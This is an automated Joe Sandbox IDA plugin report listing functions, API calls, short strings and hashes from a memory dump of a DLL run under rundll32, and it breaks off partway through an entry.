Opcode Fuzzy Hash: 22d0e1e140aac874fdce29ddc6509984b94616c0dddbf9d09c1d0fd8dd23a40b
Instruction Fuzzy Hash: 44219031705E8840FBAADBA2991079D6299BB4EFC0F1DC525FD2A437D4DE38C7488311

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800324A4 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 00000001800324C4

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 000000018003251C
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003252F
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032542

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
Instruction ID: 2d82027f7e94cb9bcb22be17a4537bea80464cdcc919518384ddf93808e552b3
Opcode Fuzzy Hash: 0f2a8a44e8f4c9cff1795b6050ee267adc792dc9736a48368970f0735874c93d
Instruction Fuzzy Hash: 0521C432611E4482EB529F29D85039EB3A0FB89BF4F198711EA794B6E8DF7CC2448700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180032A90 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 0000000180032AB3

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032B0B
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032B1E
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032B31

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
Instruction ID: 283ffb4ef057f0283fd59c714cbfe65b47d72467c2882de283dc062303e29699
Opcode Fuzzy Hash: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
Instruction Fuzzy Hash: 1221B832611A4482EB92DF29D84439EB3A0FB89BF4F198725E779476E9DF7CC6448700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180033068 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 0000000180033088

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 00000001800330E0
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800330F3
??3@YAXPEAX@Z.MSVCRT ref: 0000000180033106

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
Instruction ID: d9e03fda3b1d153f0bd4bb02b331d59468f410aa3c35072f5ffbfd31d5bd1a6e
Opcode Fuzzy Hash: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
Instruction Fuzzy Hash: CD21D632601A4482EB568F29D89139EB3A0FB88BF4F198715EA79476E8DF7CC644C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C614 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000000018003C62A
malloc.MSVCRT(?,?,?,00000001800188EE), ref: 000000018003C663
free.MSVCRT(?,?,?,00000001800188EE), ref: 000000018003C6B1
GetTickCount.KERNEL32 ref: 000000018003C6B7

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CountTick$freemalloc
String ID:
API String ID: 112427268-0
Opcode ID: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
Instruction ID: b8918b2958dc72fb2df8bfc42f6eb5cd02d312beeb31fdbe44136919b98f9138
Opcode Fuzzy Hash: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
Instruction Fuzzy Hash: 3021517261560987EFD78B24EC85BAF23A0B74C7C0F42E024F95682695DF38D75D8B02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001AF10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000018001AF4B
EnterCriticalSection.KERNEL32 ref: 000000018001AF6C
LeaveCriticalSection.KERNEL32 ref: 000000018001AFB5

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

DeleteCriticalSection.KERNEL32 ref: 000000018001AFE6

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Initialize$DeleteEnterLeave
String ID:
API String ID: 3345835275-0
Opcode ID: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
Instruction ID: bac7ba2d50b8a8327d60b40396a6a413962eafb144c30abffe047fc5a4d1e144
Opcode Fuzzy Hash: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
Instruction Fuzzy Hash: 51212970605A4896FBD29F50EC543D873A8F74EBE4F588229EAA9062A5DF39C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070910 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007093E
_msize.MSVCRT ref: 0000000180070965
realloc.MSVCRT ref: 000000018007097B
memset.MSVCRT ref: 0000000180070999

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno_msizememsetrealloc
String ID:
API String ID: 1716158884-0
Opcode ID: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
Instruction ID: eee6de8c671426a850027d5845b58404d35e5bb09185fe1037511193ebe898ed
Opcode Fuzzy Hash: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
Instruction Fuzzy Hash: 7201A536715648C1F9869B27A4043D99251AB8CBE0F1DD720BF6A07BCBDE3DC6418700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064710 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064746
FreeLibrary.KERNEL32 ref: 000000018006477F
LeaveCriticalSection.KERNEL32 ref: 0000000180064793
DeleteCriticalSection.KERNEL32 ref: 000000018006479D

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
String ID:
API String ID: 2347899730-0
Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A900 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,000000018006A78C,00000000,00000008,00000000,000000018006AA37), ref: 000000018006A91E
_swprintf_c_l.LIBCMT ref: 000000018006A93A
ReadFile.KERNEL32 ref: 000000018006A955
_swprintf_c_l.LIBCMT ref: 000000018006A974

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: File_swprintf_c_l$PointerRead
String ID:
API String ID: 1259558433-0
Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A3F0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

??_U@YAPEAX_K@Z.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A413
memmove.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A426
??_U@YAPEAX_K@Z.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A43F
memmove.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A452

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D048 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

StrCmpNIW.SHLWAPI ref: 000000018001D071
StrCmpNIW.SHLWAPI ref: 000000018001D08B

Part of subcall function 0000000180002DE4: wcsncmp.MSVCRT ref: 0000000180002E06
Part of subcall function 0000000180002DE4: wcsncmp.MSVCRT ref: 0000000180002E20

Strings

http://, xrefs: 000000018001D067
https://, xrefs: 000000018001D081

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: wcsncmp$FromListPath
String ID: http://$https://
API String ID: 1354619976-1916535328
Opcode ID: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
Instruction ID: 3b4f654c0190b1c660da69d9b707c9435e3e8476667423005c0f2b5f6a7ba28a
Opcode Fuzzy Hash: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
Instruction Fuzzy Hash: 21F06D30314B4D81FBD3AB22ED807E92361A74DBC0F08D026BE128B681EE29C79DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042CB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

Strings

Connection: Keep-Alive, xrefs: 0000000180042DE3
Cache-Control: no-cache, xrefs: 0000000180042E08

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharCriticalInitializeMultiSectionWide
String ID: Cache-Control: no-cache$Connection: Keep-Alive
API String ID: 2071930665-2797312137
Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003A138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 000000018003A3B9

Strings

map/set<T> too long, xrefs: 000000018003A3B2

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: map/set<T> too long
API String ID: 909987262-1285458680
Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C31C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 000000018001C340
wcscmp.MSVCRT ref: 000000018001C398

Strings

RUNDLL32, xrefs: 000000018001C38E

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FileFindNamePathwcscmp
String ID: RUNDLL32
API String ID: 3222201028-252960710
Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004AF08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 000000018004AF73

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

memset.MSVCRT ref: 000000018004AF8E

Strings

p, xrefs: 000000018004AF7D

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
String ID: p
API String ID: 526592482-2181537457
Opcode ID: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
Instruction ID: c7a46caf8343ac9de693e6305f929c410170157657da93c1511d6525c5ccc842
Opcode Fuzzy Hash: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
Instruction Fuzzy Hash: B221B632208F8885E7A1DF51F48078AB3A4F799BC4F158021BE8D43B59DF38C549CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004B054 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 000000018004B0BF

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

memset.MSVCRT ref: 000000018004B0DA

Strings

p, xrefs: 000000018004B0C9

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
String ID: p
API String ID: 526592482-2181537457
Opcode ID: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
Instruction ID: 630a19f9e7c8d33164371876bc9408f173fd4fcd3dffaf0243fab21a92527801
Opcode Fuzzy Hash: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
Instruction Fuzzy Hash: E1217432204F8885E7A1DF61F48078AB7A4F788BC4F558121FE8883B5ADF38C654CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AFB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005B020

Strings

opentime_afterinstall, xrefs: 000000018005B00D
MsgCenter, xrefs: 000000018005AFE8

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
